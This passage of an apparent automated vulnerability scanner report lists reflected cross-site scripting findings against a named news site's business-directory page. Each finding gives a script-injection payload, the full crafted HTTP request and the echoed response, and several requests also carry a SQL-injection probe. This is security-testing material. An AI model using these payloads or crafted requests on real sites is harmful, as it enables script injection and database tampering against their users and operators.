125-499448&sLsIdsP=125-499423%2c125-499451%2c125-500061%2c125-500014%2c125-501827%2c125-504342%2c125-505889%2c125-505964%2c125-507572%2c125-561739&sLsIdsQ=125-512454%2c125-531166%2c125-510950%2c125-519482%2c125-550392%2c125-486912%2c125-560934%2c125-555722%2c125-562036%2c125-555902&sLsIdsR=125-493413%2c125-548107%2c125-566195%2c125-549209%2c125-496651%2c125-550801%2c125-551463%2c125-564528%2c125-544691%2c125-511935&sLsIdsS=125-513610%2c125-514528%2c125-514558%2c125-518925%2c125-534894%2c125-519626%2c125-521135%2c125-521146%2c125-531280%2c125-524507&sLsIdsT=125-524511%2c125-548214%2c125-523820%2c125-561740%2c125-535592%2c125-526559%2c125-561743%2c125-543364%2c125-526572%2c125-535768&sLsIdsU=125-561744%2c125-540337%2c125-530055%2c125-539271%2c125-533352%2c125-534277%2c125-554091%2c125-535784%2c125-536134%2c125-5361685815b"><script>alert(1)</script>847c39c5e76916523&sLsIdsV=125-537139%2c125-538939%2c125-537922%2c125-561745%2c125-540042%2c125-542538%2c125-561832%2c125-560772%2c125-561851%2c125-554861&sLsIdsW=125-545138%2c125-561852%2c125-561853%2c125-561855%2c125-561856%2c125-561860%2c125-553593%2c125-561861%2c125-557156%2c125-561863&sLsIdsX=125-560787%2c125-555117%2c125-555993%2c125-560783%2c125-558689%2c125-557187%2c125-557539%2c125-560788%2c125-560650%2c125-562241&sLsIdsY=125-564252%2c125-472625%2c125-565009%2c125-565408%2c125-565406%2c125-566364%2c125-566155%2c125-566429%2c125-569520%2c125-560929&sLsIdsZ=125-490731%2c125-505509%2c125-552073%2c125-512867%2c125-528218%2c125-528217%2c125-546102%2c125-564120%2c125-564628%2c125-528175&SoL=&SOrder=A&Sort=D&strRegion=all+areas&strRegions=5%2bAll+Areas%3a%3a50000%2bAlabama%3a%3a51000%2bAlaska%3a%3a52000%2bArizona%3a%3a53000%2bArkansas%3a%3a54100%2bCalifornia%3a%3a55000%2bColorado%3a%3a56000%2bConnecticut%3a%3a57000%2bDelaware%3a%3a59100%2bFlorida%3a%3a60000%2bGeorgia%3a%3a61000%2bHawaii%3a%3a62000%2bIdaho%3a%3a63000%2bIllinois%3a%3a64000%2bIndiana%3a%3a65000%2bIowa%3a%3a66000%2bKansas%3a%3a67000%2bKentucky%3a%3a68100%2bLouisiana%3a%3a69000%2bMaine%3a%3a70000%2bMaryland%3a%3a71200%2bMassachusetts%3a%3a72000%2bMichigan%3a%3a73000%2bMinnesota%3a%3a74000%2bMississippi%3a%3a75000%2bMissouri%3a%3a76000%2bMontana%3a%3a77000%2bNebraska%3a%3a78100%2bNevada%3a%3a79000%2bNew+Hampshire%3a%3a80100%2bNew+Jersey%3a%3a81000%2bNew+Mexico%3a%3a2022%2bNew+York%3a%3a82400%2bNew+York+City+Metro+Area%3a%3a83000%2bNorth+Carolina%3a%3a84000%2bNorth+Datoka%3a%3a85000%2bOhio%3a%3a86000%2bOklahoma%3a%3a87000%2bOregon%3a%3a88000%2bPennsylvania%3a%3a89000%2bRhode+Island%3a%3a90000%2bSouth+Carolina%3a%3a91000%2bSouth+Dakota%3a%3a92000%2bTennessee%3a%3a93000%2bTexas%3a%3a94000%2bUtah%3a%3a95000%2bVermont%3a%3a96000%2bVirginia%3a%3a97000%2bWashington%3a%3a58000%2bWashington+D.C.%3a%3a98000%2bWest+Virginia%3a%3a99000%2bWisconsin%3a%3a100000%2bWyoming%3a%3a&strSQL3=Execute+uspSearchListingsByLsIds+'BIZDIR'%2c&strStates=&SubCatId=&ThisPage=1 HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:23:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 91512
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCCDTSTDT=GKOLPOGADNBLJHJDKANNAEBE; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

   
   <head>
       <meta http-equi
...[SNIP]...
<input type="hidden" name="sLsIdsU" value="125-561744,125-540337,125-530055,125-539271,125-533352,125-534277,125-554091,125-535784,125-536134,125-5361685815b"><script>alert(1)</script>847c39c5e76916523">
...[SNIP]...

4.316. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [sLsIdsV parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the sLsIdsV request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45222"><script>alert(1)</script>47a0f1d5d721d4b08 was submitted in the sLsIdsV parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /BusinessDirectory/List_Listings.asp?AdTagCountyId=&AdTagPriceIndx=&CategoryId=BIZDIR&ChangeEmail=&cid=999&DOrder=A&GroupId=&intl=&KeyWord=&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=A&RegionId=&ROrder=A&RSCount=2500&sLsIds0=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281&sLsIds1=80-N1010223%2c80-N1010192%2c80-N1011111%2c80-N1011051%2c80-N1010272%2c80-N1011071%2c80-N1009282%2c80-N1010211%2c80-N1011121%2c80-N1009242&sLsIds2=80-N1010218%2c20-1000297132_020%2c125-454145%2c125-500168%2c125-561603%2c125-557500%2c125-505633%2c125-502057%2c125-569378%2c125-451879&sLsIds3=125-563290%2c125-492069%2c125-487258%2c125-473954%2c125-516760%2c125-529105%2c125-529136%2c125-565044%2c125-452044%2c125-471500&sLsIds4=125-558791%2c125-555521%2c125-561463%2c125-549434%2c125-434068%2c125-530728%2c125-564022%2c125-557581%2c125-560091%2c125-563157&sLsIds5=125-491745%2c125-547950%2c125-509222%2c125-568138%2c125-557766%2c125-559177%2c125-537020%2c125-506111%2c125-560157%2c125-566240&sLsIds6=125-557675%2c125-551396%2c125-559267%2c125-533573%2c125-458445%2c125-538467%2c125-471913%2c125-482897%2c125-535950%2c125-499401&sLsIds7=125-486445%2c125-529496%2c125-429362%2c125-501989%2c125-502772%2c125-534073%2c125-530131%2c125-494155%2c125-517168%2c125-557932&sLsIds8=125-514452%2c125-541145%2c125-416753%2c125-444446%2c125-537604%2c125-502641%2c125-567841%2c125-564153%2c20-1000290506_030%2c125-570359&sLsIds9=125-539476%2c125-431610%2c125-442946%2c125-560310%2c125-497124%2c125-529949%2c125-568533%2c125-558371%2c125-553006%2c125-553112&sLsIdsA=125-560826%2c125-549432%2c125-552794%2c125-545063%2c125-552800%2c125-549795%2c125-552790%2c125-552796%2c125-551814%2c125-545983&sLsIdsAA=125-553610%2c125-518851%2c125-553607%2c125-556074%2c125-558240%2c125-499512%2c125-526065%2c125-462985%2c125-544762%2c125-560817&sLsIdsAB=125-522621%2c125-567005%2c125-364577%2c125-333056%2c125-565752%2c125-389754%2c125-405051%2c125-558962%2c125-441721%2c125-542506&sLsIdsAC=125-521855%2c125-495755%2c125-503906%2c125-565552%2c125-556750%2c125-475131%2c125-202650%2c125-510030%2c125-570191%2c125-475695&sLsIdsAD=125-555585%2c125-565528%2c125-520249%2c125-541247%2c125-556121%2c125-547008%2c125-568447%2c125-545194%2c125-512492%2c125-297311&sLsIdsB=125-551828%2c125-552791%2c125-552803%2c125-453304%2c125-552666%2c125-521482%2c125-521477%2c125-521479%2c125-488823%2c125-545359&sLsIdsC=125-527579%2c125-525464%2c125-527584%2c125-475581%2c125-510064%2c125-565038%2c125-554987%2c125-559008%2c125-525927%2c125-526128&sLsIdsD=125-526018%2c125-526144%2c125-529057%2c125-567748%2c125-526023%2c125-555190%2c125-559612%2c125-555175%2c125-554984%2c125-547837&sLsIdsE=125-547750%2c125-548054%2c125-525923%2c125-494906%2c125-531825%2c125-550469%2c125-567828%2c125-490106%2c125-566918%2c125-529618&sLsIdsF=125-463922%2c125-464100%2c125-488817%2c125-557391%2c125-522086%2c125-548195%2c125-553895%2c125-558344%2c125-564715%2c125-556870&sLsIdsG=125-554611%2c125-518058%2c125-532291%2c125-532292%2c125-482057%2c125-569094%2c125-555551%2c125-462478%2c125-469804%2c125-500828&sLsIdsH=125-504736%2c125-521946%2c125-517146%2c125-518850%2c125-524081%2c125-527129%2c125-527511%2c125-527508%2c125-528677%2c125-533450&sLsIdsI=125-540051%2c125-544122%2c125-549166%2c125-546131%2c125-550891%2c125-563445%2c125-560883%2c125-560309%2c125-565198%2c125-565179&sLsIdsJ=125-566478%2c125-566482%2c125-564856%2c125-565126%2c125-569444%2c125-531599%2c125-550866%2c125-560171%2c125-539587%2c125-567941&sLsIdsK=125-566956%2c125-513013%2c125-493766%2c125-521916%2c125-522018%2c125-554134%2c125-521507%2c125-521264%2c125-541992%2c125-521281&sLsIdsL=125-557904%2c125-565259%2c125-442451%2c125-551241%2c125-488296%2c125-568500%2c125-569515%2c125-548226%2c125-559444%2c125-565130&sLsIdsM=125-395953%2c125-491487%2c125-444457%2c125-464308%2c125-454440%2c125-454446%2c125-472602%2c125-418913%2c125-422194%2c125-561731&sLsIdsN=125-483424%2c125-471203%2c125-430646%2c125-436208%2c125-561736%2c125-394065%2c125-539553%2c125-454345%2c125-463424%2c125-470693&sLsIdsO=125-470909%2c125-481310%2c125-486834%2c125-490712%2c125-419767%2c125-497400%2c125-561713%2c125-496638%2c125-498359%2c125-499448&sLsIdsP=125-499423%2c125-499451%2c125-500061%2c125-500014%2c125-501827%2c125-504342%2c125-505889%2c125-505964%2c125-507572%2c125-561739&sLsIdsQ=125-512454%2c125-531166%2c125-510950%2c125-519482%2c125-550392%2c125-486912%2c125-560934%2c125-555722%2c125-562036%2c125-555902&sLsIdsR=125-493413%2c125-548107%2c125-566195%2c125-549209%2c125-496651%2c125-550801%2c125-551463%2c125-564528%2c125-544691%2c125-511935&sLsIdsS=125-513610%2c125-514528%2c125-514558%2c125-518925%2c125-534894%2c125-519626%2c125-521135%2c125-521146%2c125-531280%2c125-524507&sLsIdsT=125-524511%2c125-548214%2c125-523820%2c125-561740%2c125-535592%2c125-526559%2c125-561743%2c125-543364%2c125-526572%2c125-535768&sLsIdsU=125-561744%2c125-540337%2c125-530055%2c125-539271%2c125-533352%2c125-534277%2c125-554091%2c125-535784%2c125-536134%2c125-536168&sLsIdsV=125-537139%2c125-538939%2c125-537922%2c125-561745%2c125-540042%2c125-542538%2c125-561832%2c125-560772%2c125-561851%2c125-55486145222"><script>alert(1)</script>47a0f1d5d721d4b08&sLsIdsW=125-545138%2c125-561852%2c125-561853%2c125-561855%2c125-561856%2c125-561860%2c125-553593%2c125-561861%2c125-557156%2c125-561863&sLsIdsX=125-560787%2c125-555117%2c125-555993%2c125-560783%2c125-558689%2c125-557187%2c125-557539%2c125-560788%2c125-560650%2c125-562241&sLsIdsY=125-564252%2c125-472625%2c125-565009%2c125-565408%2c125-565406%2c125-566364%2c125-566155%2c125-566429%2c125-569520%2c125-560929&sLsIdsZ=125-490731%2c125-505509%2c125-552073%2c125-512867%2c125-528218%2c125-528217%2c125-546102%2c125-564120%2c125-564628%2c125-528175&SoL=&SOrder=A&Sort=D&strRegion=all+areas&strRegions=5%2bAll+Areas%3a%3a50000%2bAlabama%3a%3a51000%2bAlaska%3a%3a52000%2bArizona%3a%3a53000%2bArkansas%3a%3a54100%2bCalifornia%3a%3a55000%2bColorado%3a%3a56000%2bConnecticut%3a%3a57000%2bDelaware%3a%3a59100%2bFlorida%3a%3a60000%2bGeorgia%3a%3a61000%2bHawaii%3a%3a62000%2bIdaho%3a%3a63000%2bIllinois%3a%3a64000%2bIndiana%3a%3a65000%2bIowa%3a%3a66000%2bKansas%3a%3a67000%2bKentucky%3a%3a68100%2bLouisiana%3a%3a69000%2bMaine%3a%3a70000%2bMaryland%3a%3a71200%2bMassachusetts%3a%3a72000%2bMichigan%3a%3a73000%2bMinnesota%3a%3a74000%2bMississippi%3a%3a75000%2bMissouri%3a%3a76000%2bMontana%3a%3a77000%2bNebraska%3a%3a78100%2bNevada%3a%3a79000%2bNew+Hampshire%3a%3a80100%2bNew+Jersey%3a%3a81000%2bNew+Mexico%3a%3a2022%2bNew+York%3a%3a82400%2bNew+York+City+Metro+Area%3a%3a83000%2bNorth+Carolina%3a%3a84000%2bNorth+Datoka%3a%3a85000%2bOhio%3a%3a86000%2bOklahoma%3a%3a87000%2bOregon%3a%3a88000%2bPennsylvania%3a%3a89000%2bRhode+Island%3a%3a90000%2bSouth+Carolina%3a%3a91000%2bSouth+Dakota%3a%3a92000%2bTennessee%3a%3a93000%2bTexas%3a%3a94000%2bUtah%3a%3a95000%2bVermont%3a%3a96000%2bVirginia%3a%3a97000%2bWashington%3a%3a58000%2bWashington+D.C.%3a%3a98000%2bWest+Virginia%3a%3a99000%2bWisconsin%3a%3a100000%2bWyoming%3a%3a&strSQL3=Execute+uspSearchListingsByLsIds+'BIZDIR'%2c&strStates=&SubCatId=&ThisPage=1 HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:23:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 91549
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCCDTSTDT=HKOLPOGAGODPFGGGGFKHKBEC; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

   
   <head>
       <meta http-equi
...[SNIP]...
<input type="hidden" name="sLsIdsV" value="125-537139,125-538939,125-537922,125-561745,125-540042,125-542538,125-561832,125-560772,125-561851,125-55486145222"><script>alert(1)</script>47a0f1d5d721d4b08">
...[SNIP]...

4.317. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [sLsIdsV parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the sLsIdsV request parameter is copied into the HTML document as plain text between tags. The payload c969f<script>alert(1)</script>ebe2a99f125 was submitted in the sLsIdsV parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /BusinessDirectory/List_Listings.asp HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF; ASPSESSIONIDACCRTTDT=EHDHDNGAFBGCHINIICBALKAB; ASPSESSIONIDSCBSSQAT=IBNKJLNDLPHGNPGDKFHLPIOI; ASPSESSIONIDCADQTTDT=ENMHKJGAMFJMFIFDNFGMGMOE; ASPSESSIONIDSABRQSAS=FELKNADAPLOANHOJMNHCBFEN; ASPSESSIONIDCCDTSTDT=JFOLPOGAMCPNEGJMKEMOJBLJ; ASPSESSIONIDSCCSTRAT=EDDDEGAAKEEOJFIKLGKLFKHO; ASPSESSIONIDCADTSTCS=KDIPGLGAPHDILBCBFEABDOGA
Accept-Encoding: gzip, deflate
Content-Length: 7048

AdTagCountyId=' OR '1'='1&AdTagPriceIndx=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&cid=999&DOrder=A&GroupId=3&intl=3&KeyWord=3&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=A&RegionId=3&
...[SNIP]...
2c125-534277%2c125-554091%2c125-535784%2c125-536134%2c125-536168&sLsIdsV=125-537139%2c125-538939%2c125-537922%2c125-561745%2c125-540042%2c125-542538%2c125-561832%2c125-560772%2c125-561851%2c125-554861c969f<script>alert(1)</script>ebe2a99f125&sLsIdsW=125-545138%2c125-561852%2c125-561853%2c125-561855%2c125-561856%2c125-561860%2c125-553593%2c125-561861%2c125-557156%2c125-561863&sLsIdsX=125-560787%2c125-555117%2c125-555993%2c125-560783%2c125
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:48:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 7122
Content-Type: text/html
Cache-control: private

<h1>Form</h1>AdTagCountyId=' OR '1'='1&AdTagPriceIndx=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&cid=999&DOrder=A&GroupId=3&intl=3&KeyWord=3&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=
...[SNIP]...
%2c125-534277%2c125-554091%2c125-535784%2c125-536134%2c125-536168&sLsIdsV=125-537139%2c125-538939%2c125-537922%2c125-561745%2c125-540042%2c125-542538%2c125-561832%2c125-560772%2c125-561851%2c125-554861c969f<script>alert(1)</script>ebe2a99f125&sLsIdsW=125-545138%2c125-561852%2c125-561853%2c125-561855%2c125-561856%2c125-561860%2c125-553593%2c125-561861%2c125-557156%2c125-561863&sLsIdsX=125-560787%2c125-555117%2c125-555993%2c125-560783%2c125-
...[SNIP]...

4.318. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [sLsIdsW parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the sLsIdsW request parameter is copied into the HTML document as plain text between tags. The payload 23d77<script>alert(1)</script>6baed658fac was submitted in the sLsIdsW parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /BusinessDirectory/List_Listings.asp HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF; ASPSESSIONIDACCRTTDT=EHDHDNGAFBGCHINIICBALKAB; ASPSESSIONIDSCBSSQAT=IBNKJLNDLPHGNPGDKFHLPIOI; ASPSESSIONIDCADQTTDT=ENMHKJGAMFJMFIFDNFGMGMOE; ASPSESSIONIDSABRQSAS=FELKNADAPLOANHOJMNHCBFEN; ASPSESSIONIDCCDTSTDT=JFOLPOGAMCPNEGJMKEMOJBLJ; ASPSESSIONIDSCCSTRAT=EDDDEGAAKEEOJFIKLGKLFKHO; ASPSESSIONIDCADTSTCS=KDIPGLGAPHDILBCBFEABDOGA
Accept-Encoding: gzip, deflate
Content-Length: 7048

AdTagCountyId=' OR '1'='1&AdTagPriceIndx=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&cid=999&DOrder=A&GroupId=3&intl=3&KeyWord=3&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=A&RegionId=3&
...[SNIP]...
2c125-542538%2c125-561832%2c125-560772%2c125-561851%2c125-554861&sLsIdsW=125-545138%2c125-561852%2c125-561853%2c125-561855%2c125-561856%2c125-561860%2c125-553593%2c125-561861%2c125-557156%2c125-56186323d77<script>alert(1)</script>6baed658fac&sLsIdsX=125-560787%2c125-555117%2c125-555993%2c125-560783%2c125-558689%2c125-557187%2c125-557539%2c125-560788%2c125-560650%2c125-562241&sLsIdsY=125-564252%2c125-472625%2c125-565009%2c125-565408%2c125
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:49:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 7122
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCCCQRTDT=MGGPHCHACNOMJBJEFPCBPAMO; path=/
Cache-control: private

<h1>Form</h1>AdTagCountyId=' OR '1'='1&AdTagPriceIndx=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&cid=999&DOrder=A&GroupId=3&intl=3&KeyWord=3&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=
...[SNIP]...
%2c125-542538%2c125-561832%2c125-560772%2c125-561851%2c125-554861&sLsIdsW=125-545138%2c125-561852%2c125-561853%2c125-561855%2c125-561856%2c125-561860%2c125-553593%2c125-561861%2c125-557156%2c125-56186323d77<script>alert(1)</script>6baed658fac&sLsIdsX=125-560787%2c125-555117%2c125-555993%2c125-560783%2c125-558689%2c125-557187%2c125-557539%2c125-560788%2c125-560650%2c125-562241&sLsIdsY=125-564252%2c125-472625%2c125-565009%2c125-565408%2c125-
...[SNIP]...

4.319. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [sLsIdsW parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the sLsIdsW request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dfb6b"><script>alert(1)</script>8166429791be06173 was submitted in the sLsIdsW parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /BusinessDirectory/List_Listings.asp?AdTagCountyId=&AdTagPriceIndx=&CategoryId=BIZDIR&ChangeEmail=&cid=999&DOrder=A&GroupId=&intl=&KeyWord=&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=A&RegionId=&ROrder=A&RSCount=2500&sLsIds0=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281&sLsIds1=80-N1010223%2c80-N1010192%2c80-N1011111%2c80-N1011051%2c80-N1010272%2c80-N1011071%2c80-N1009282%2c80-N1010211%2c80-N1011121%2c80-N1009242&sLsIds2=80-N1010218%2c20-1000297132_020%2c125-454145%2c125-500168%2c125-561603%2c125-557500%2c125-505633%2c125-502057%2c125-569378%2c125-451879&sLsIds3=125-563290%2c125-492069%2c125-487258%2c125-473954%2c125-516760%2c125-529105%2c125-529136%2c125-565044%2c125-452044%2c125-471500&sLsIds4=125-558791%2c125-555521%2c125-561463%2c125-549434%2c125-434068%2c125-530728%2c125-564022%2c125-557581%2c125-560091%2c125-563157&sLsIds5=125-491745%2c125-547950%2c125-509222%2c125-568138%2c125-557766%2c125-559177%2c125-537020%2c125-506111%2c125-560157%2c125-566240&sLsIds6=125-557675%2c125-551396%2c125-559267%2c125-533573%2c125-458445%2c125-538467%2c125-471913%2c125-482897%2c125-535950%2c125-499401&sLsIds7=125-486445%2c125-529496%2c125-429362%2c125-501989%2c125-502772%2c125-534073%2c125-530131%2c125-494155%2c125-517168%2c125-557932&sLsIds8=125-514452%2c125-541145%2c125-416753%2c125-444446%2c125-537604%2c125-502641%2c125-567841%2c125-564153%2c20-1000290506_030%2c125-570359&sLsIds9=125-539476%2c125-431610%2c125-442946%2c125-560310%2c125-497124%2c125-529949%2c125-568533%2c125-558371%2c125-553006%2c125-553112&sLsIdsA=125-560826%2c125-549432%2c125-552794%2c125-545063%2c125-552800%2c125-549795%2c125-552790%2c125-552796%2c125-551814%2c125-545983&sLsIdsAA=125-553610%2c125-518851%2c125-553607%2c125-556074%2c125-558240%2c125-499512%2c125-526065%2c125-462985%2c125-544762%2c125-560817&sLsIdsAB=125-522621%2c125-567005%2c125-364577%2c125-333056%2c125-565752%2c125-389754%2c125-405051%2c125-558962%2c125-441721%2c125-542506&sLsIdsAC=125-521855%2c125-495755%2c125-503906%2c125-565552%2c125-556750%2c125-475131%2c125-202650%2c125-510030%2c125-570191%2c125-475695&sLsIdsAD=125-555585%2c125-565528%2c125-520249%2c125-541247%2c125-556121%2c125-547008%2c125-568447%2c125-545194%2c125-512492%2c125-297311&sLsIdsB=125-551828%2c125-552791%2c125-552803%2c125-453304%2c125-552666%2c125-521482%2c125-521477%2c125-521479%2c125-488823%2c125-545359&sLsIdsC=125-527579%2c125-525464%2c125-527584%2c125-475581%2c125-510064%2c125-565038%2c125-554987%2c125-559008%2c125-525927%2c125-526128&sLsIdsD=125-526018%2c125-526144%2c125-529057%2c125-567748%2c125-526023%2c125-555190%2c125-559612%2c125-555175%2c125-554984%2c125-547837&sLsIdsE=125-547750%2c125-548054%2c125-525923%2c125-494906%2c125-531825%2c125-550469%2c125-567828%2c125-490106%2c125-566918%2c125-529618&sLsIdsF=125-463922%2c125-464100%2c125-488817%2c125-557391%2c125-522086%2c125-548195%2c125-553895%2c125-558344%2c125-564715%2c125-556870&sLsIdsG=125-554611%2c125-518058%2c125-532291%2c125-532292%2c125-482057%2c125-569094%2c125-555551%2c125-462478%2c125-469804%2c125-500828&sLsIdsH=125-504736%2c125-521946%2c125-517146%2c125-518850%2c125-524081%2c125-527129%2c125-527511%2c125-527508%2c125-528677%2c125-533450&sLsIdsI=125-540051%2c125-544122%2c125-549166%2c125-546131%2c125-550891%2c125-563445%2c125-560883%2c125-560309%2c125-565198%2c125-565179&sLsIdsJ=125-566478%2c125-566482%2c125-564856%2c125-565126%2c125-569444%2c125-531599%2c125-550866%2c125-560171%2c125-539587%2c125-567941&sLsIdsK=125-566956%2c125-513013%2c125-493766%2c125-521916%2c125-522018%2c125-554134%2c125-521507%2c125-521264%2c125-541992%2c125-521281&sLsIdsL=125-557904%2c125-565259%2c125-442451%2c125-551241%2c125-488296%2c125-568500%2c125-569515%2c125-548226%2c125-559444%2c125-565130&sLsIdsM=125-395953%2c125-491487%2c125-444457%2c125-464308%2c125-454440%2c125-454446%2c125-472602%2c125-418913%2c125-422194%2c125-561731&sLsIdsN=125-483424%2c125-471203%2c125-430646%2c125-436208%2c125-561736%2c125-394065%2c125-539553%2c125-454345%2c125-463424%2c125-470693&sLsIdsO=125-470909%2c125-481310%2c125-486834%2c125-490712%2c125-419767%2c125-497400%2c125-561713%2c125-496638%2c125-498359%2c125-499448&sLsIdsP=125-499423%2c125-499451%2c125-500061%2c125-500014%2c125-501827%2c125-504342%2c125-505889%2c125-505964%2c125-507572%2c125-561739&sLsIdsQ=125-512454%2c125-531166%2c125-510950%2c125-519482%2c125-550392%2c125-486912%2c125-560934%2c125-555722%2c125-562036%2c125-555902&sLsIdsR=125-493413%2c125-548107%2c125-566195%2c125-549209%2c125-496651%2c125-550801%2c125-551463%2c125-564528%2c125-544691%2c125-511935&sLsIdsS=125-513610%2c125-514528%2c125-514558%2c125-518925%2c125-534894%2c125-519626%2c125-521135%2c125-521146%2c125-531280%2c125-524507&sLsIdsT=125-524511%2c125-548214%2c125-523820%2c125-561740%2c125-535592%2c125-526559%2c125-561743%2c125-543364%2c125-526572%2c125-535768&sLsIdsU=125-561744%2c125-540337%2c125-530055%2c125-539271%2c125-533352%2c125-534277%2c125-554091%2c125-535784%2c125-536134%2c125-536168&sLsIdsV=125-537139%2c125-538939%2c125-537922%2c125-561745%2c125-540042%2c125-542538%2c125-561832%2c125-560772%2c125-561851%2c125-554861&sLsIdsW=125-545138%2c125-561852%2c125-561853%2c125-561855%2c125-561856%2c125-561860%2c125-553593%2c125-561861%2c125-557156%2c125-561863dfb6b"><script>alert(1)</script>8166429791be06173&sLsIdsX=125-560787%2c125-555117%2c125-555993%2c125-560783%2c125-558689%2c125-557187%2c125-557539%2c125-560788%2c125-560650%2c125-562241&sLsIdsY=125-564252%2c125-472625%2c125-565009%2c125-565408%2c125-565406%2c125-566364%2c125-566155%2c125-566429%2c125-569520%2c125-560929&sLsIdsZ=125-490731%2c125-505509%2c125-552073%2c125-512867%2c125-528218%2c125-528217%2c125-546102%2c125-564120%2c125-564628%2c125-528175&SoL=&SOrder=A&Sort=D&strRegion=all+areas&strRegions=5%2bAll+Areas%3a%3a50000%2bAlabama%3a%3a51000%2bAlaska%3a%3a52000%2bArizona%3a%3a53000%2bArkansas%3a%3a54100%2bCalifornia%3a%3a55000%2bColorado%3a%3a56000%2bConnecticut%3a%3a57000%2bDelaware%3a%3a59100%2bFlorida%3a%3a60000%2bGeorgia%3a%3a61000%2bHawaii%3a%3a62000%2bIdaho%3a%3a63000%2bIllinois%3a%3a64000%2bIndiana%3a%3a65000%2bIowa%3a%3a66000%2bKansas%3a%3a67000%2bKentucky%3a%3a68100%2bLouisiana%3a%3a69000%2bMaine%3a%3a70000%2bMaryland%3a%3a71200%2bMassachusetts%3a%3a72000%2bMichigan%3a%3a73000%2bMinnesota%3a%3a74000%2bMississippi%3a%3a75000%2bMissouri%3a%3a76000%2bMontana%3a%3a77000%2bNebraska%3a%3a78100%2bNevada%3a%3a79000%2bNew+Hampshire%3a%3a80100%2bNew+Jersey%3a%3a81000%